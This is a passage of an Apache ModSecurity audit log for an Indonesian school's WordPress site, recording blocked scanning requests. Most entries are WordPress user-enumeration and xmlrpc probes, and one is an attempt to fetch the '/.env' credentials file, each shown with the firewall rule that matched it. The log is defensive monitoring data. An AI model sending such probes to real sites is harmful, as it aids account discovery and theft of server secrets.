%s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747504211171174 5454 (- - -) Stopwatch2: 1747504211171174 5454; combined=3954, p1=645, p2=3058, p3=29, p4=31, p5=137, sr=73, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df43d724-Z-- --3421ff41-A-- [18/May/2025:00:51:01 +0700] aCjMhem4kjNN-hEbWjJMSwAAAFc 103.236.140.4 57402 103.236.140.4 8181 --3421ff41-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3421ff41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3421ff41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747504261774921 2749 (- - -) Stopwatch2: 1747504261774921 2749; combined=1575, p1=472, p2=1076, p3=0, p4=0, p5=27, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3421ff41-Z-- --a0b44a39-A-- [18/May/2025:00:51:10 +0700] aCjMjum4kjNN-hEbWjJMXwAAAFg 103.236.140.4 57796 103.236.140.4 8181 --a0b44a39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.13 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a0b44a39-C-- demo.sayHello --a0b44a39-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0b44a39-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747504270717492 5535 (- - -) Stopwatch2: 1747504270717492 5535; combined=4144, p1=472, p2=3433, p3=42, p4=56, p5=82, sr=58, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0b44a39-Z-- --cfa8133e-A-- [18/May/2025:00:51:40 +0700] aCjMrOm4kjNN-hEbWjJMyAAAAEs 103.236.140.4 59904 103.236.140.4 8181 --cfa8133e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cfa8133e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfa8133e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747504300474135 2326 (- - -) Stopwatch2: 1747504300474135 2326; combined=1251, p1=410, p2=814, p3=0, p4=0, p5=26, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfa8133e-Z-- --99b48c0d-A-- [18/May/2025:00:52:46 +0700] aCjM7nyxdQCiyU1ENFdJhwAAAAo 103.236.140.4 36794 103.236.140.4 8181 --99b48c0d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.251 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --99b48c0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99b48c0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747504366899964 2008 (- - -) Stopwatch2: 1747504366899964 2008; combined=1054, p1=357, p2=674, p3=0, p4=0, p5=23, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99b48c0d-Z-- --96fcc55b-A-- [18/May/2025:00:52:55 +0700] aCjM9-m4kjNN-hEbWjJOoQAAAEk 103.236.140.4 37472 103.236.140.4 8181 --96fcc55b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.251 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --96fcc55b-C-- demo.sayHello --96fcc55b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --96fcc55b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747504375503549 4949 (- - -) Stopwatch2: 1747504375503549 4949; combined=3448, p1=571, p2=2696, p3=26, p4=26, p5=75, sr=64, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96fcc55b-Z-- --0c903d5e-A-- [18/May/2025:00:53:36 +0700] aCjNIATOsBn9MSWb6WKFiAAAAIc 103.236.140.4 40568 103.236.140.4 8181 --0c903d5e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.207 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0c903d5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c903d5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747504416289151 3113 (- - -) Stopwatch2: 1747504416289151 3113; combined=1435, p1=387, p2=1000, p3=0, p4=0, p5=47, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c903d5e-Z-- --12eb6b60-A-- [18/May/2025:00:53:49 +0700] aCjNLXyxdQCiyU1ENFdL7wAAAAI 103.236.140.4 41540 103.236.140.4 8181 --12eb6b60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.207 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --12eb6b60-C-- demo.sayHello --12eb6b60-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --12eb6b60-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747504429450915 4809 (- - -) Stopwatch2: 1747504429450915 4809; combined=3460, p1=450, p2=2814, p3=35, p4=37, p5=74, sr=55, sw=50, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12eb6b60-Z-- --f6dc4721-A-- [18/May/2025:01:00:34 +0700] aCjOwhKi5m5upc8uMd7k1wAAAMY 103.236.140.4 41484 103.236.140.4 8181 --f6dc4721-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f6dc4721-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6dc4721-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747504834318144 2463 (- - -) Stopwatch2: 1747504834318144 2463; combined=1391, p1=428, p2=936, p3=0, p4=0, p5=27, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6dc4721-Z-- --2d050f45-A-- [18/May/2025:01:00:39 +0700] aCjOx3yxdQCiyU1ENFdVYwAAAAo 103.236.140.4 41876 103.236.140.4 8181 --2d050f45-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2d050f45-C-- demo.sayHello --2d050f45-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d050f45-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747504839757281 5871 (- - -) Stopwatch2: 1747504839757281 5871; combined=4426, p1=596, p2=3596, p3=39, p4=53, p5=85, sr=56, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d050f45-Z-- --b8f7a027-A-- [18/May/2025:01:03:00 +0700] aCjPVOm4kjNN-hEbWjJfBAAAAEM 103.236.140.4 52578 103.236.140.4 8181 --b8f7a027-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.85 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.85 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b8f7a027-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8f7a027-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747504980686448 22441 (- - -) Stopwatch2: 1747504980686448 22441; combined=1903, p1=505, p2=1365, p3=0, p4=0, p5=33, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8f7a027-Z-- --56519c04-A-- [18/May/2025:01:03:09 +0700] aCjPXRKi5m5upc8uMd7onAAAAMU 103.236.140.4 53280 103.236.140.4 8181 --56519c04-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.85 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.85 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --56519c04-C-- demo.sayHello --56519c04-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --56519c04-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747504989962900 6470 (- - -) Stopwatch2: 1747504989962900 6470; combined=4935, p1=646, p2=3957, p3=42, p4=41, p5=144, sr=71, sw=105, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56519c04-Z-- --702a575f-A-- [18/May/2025:01:07:49 +0700] aCjQdRKi5m5upc8uMd7xxAAAAM4 103.236.140.4 45134 103.236.140.4 8181 --702a575f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 70.39.75.187 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 70.39.75.187 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --702a575f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --702a575f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747505269531907 868 (- - -) Stopwatch2: 1747505269531907 868; combined=292, p1=258, p2=0, p3=0, p4=0, p5=34, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --702a575f-Z-- --c2ed0b77-A-- [18/May/2025:01:20:34 +0700] aCjTcum4kjNN-hEbWjJ5xQAAAE8 103.236.140.4 45882 103.236.140.4 8181 --c2ed0b77-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.68 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c2ed0b77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2ed0b77-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747506034827659 2555 (- - -) Stopwatch2: 1747506034827659 2555; combined=1110, p1=399, p2=682, p3=0, p4=0, p5=28, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2ed0b77-Z-- --9da8b170-A-- [18/May/2025:01:20:44 +0700] aCjTfATOsBn9MSWb6WKy9AAAAI0 103.236.140.4 46612 103.236.140.4 8181 --9da8b170-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.68 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9da8b170-C-- demo.sayHello --9da8b170-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9da8b170-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747506044517286 6172 (- - -) Stopwatch2: 1747506044517286 6172; combined=4845, p1=633, p2=3963, p3=40, p4=42, p5=102, sr=85, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9da8b170-Z-- --be013a5e-A-- [18/May/2025:01:21:21 +0700] aCjToRKi5m5upc8uMd4JNAAAANA 103.236.140.4 49454 103.236.140.4 8181 --be013a5e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --be013a5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be013a5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747506081341675 3480 (- - -) Stopwatch2: 1747506081341675 3480; combined=1741, p1=565, p2=1146, p3=0, p4=0, p5=30, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be013a5e-Z-- --01a63213-A-- [18/May/2025:01:21:33 +0700] aCjTrem4kjNN-hEbWjJ7gwAAAFc 103.236.140.4 50448 103.236.140.4 8181 --01a63213-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.155 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --01a63213-C-- demo.sayHello --01a63213-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --01a63213-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747506093729591 5274 (- - -) Stopwatch2: 1747506093729591 5274; combined=3885, p1=470, p2=3182, p3=35, p4=29, p5=98, sr=60, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01a63213-Z-- --00918667-A-- [18/May/2025:01:22:00 +0700] aCjTyBKi5m5upc8uMd4KMQAAAMU 103.236.140.4 52446 103.236.140.4 8181 --00918667-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --00918667-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00918667-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 